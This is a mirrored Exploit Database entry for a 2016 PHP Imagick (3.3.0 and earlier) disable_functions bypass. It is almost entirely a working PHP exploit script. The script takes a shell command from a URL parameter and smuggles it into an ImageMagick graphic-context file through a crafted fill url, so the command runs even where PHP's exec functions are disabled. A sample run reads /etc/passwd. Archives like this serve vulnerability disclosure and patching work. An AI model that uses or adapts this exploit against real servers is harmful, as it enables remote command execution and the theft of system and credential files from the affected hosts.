Imagick 3.3.0 (PHP 5.4) – disable_functions Bypass

• Exploit Database
• 13 阅读

• 作者： RicterZ
  日期： 2016-05-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39766/

• # Exploit Title: PHP Imagick disable_functions Bypass
  # Date: 2016-05-04
  # Exploit Author: RicterZ (ricter@chaitin.com)
  # Vendor Homepage: https://pecl.php.net/package/imagick
  # Version: Imagick<= 3.3.0 PHP >= 5.4
  # Test on: Ubuntu 12.04
  
  # Exploit:
  
  <?php
  # PHP Imagick disable_functions Bypass
  # Author: Ricter <ricter@chaitin.com>
  #
  # $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd"
  # <pre>
  # Disable functions: exec,passthru,shell_exec,system,popen
  # Run command: cat /etc/passwd
  # ====================
  # root:x:0:0:root:/root:/usr/local/bin/fish
  # daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  # bin:x:2:2:bin:/bin:/bin/sh
  # sys:x:3:3:sys:/dev:/bin/sh
  # sync:x:4:65534:sync:/bin:/bin/sync
  # games:x:5:60:games:/usr/games:/bin/sh
  # ...
  # </pre>
  echo "Disable functions: " . ini_get("disable_functions") . "\n";
  $command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
  echo "Run command: $command\n====================\n";
  
  $data_file = tempnam('/tmp', 'img');
  $imagick_file = tempnam('/tmp', 'img');
  
  $exploit = <<<EOF
  push graphic-context
  viewbox 0 0 640 480
  fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")'
  pop graphic-context
  EOF;
  
  file_put_contents("$imagick_file", $exploit);
  $thumb = new Imagick();
  $thumb->readImage("$imagick_file");
  $thumb->writeImage(tempnam('/tmp', 'img'));
  $thumb->clear();
  $thumb->destroy();
  
  echo file_get_contents($data_file);
  ?>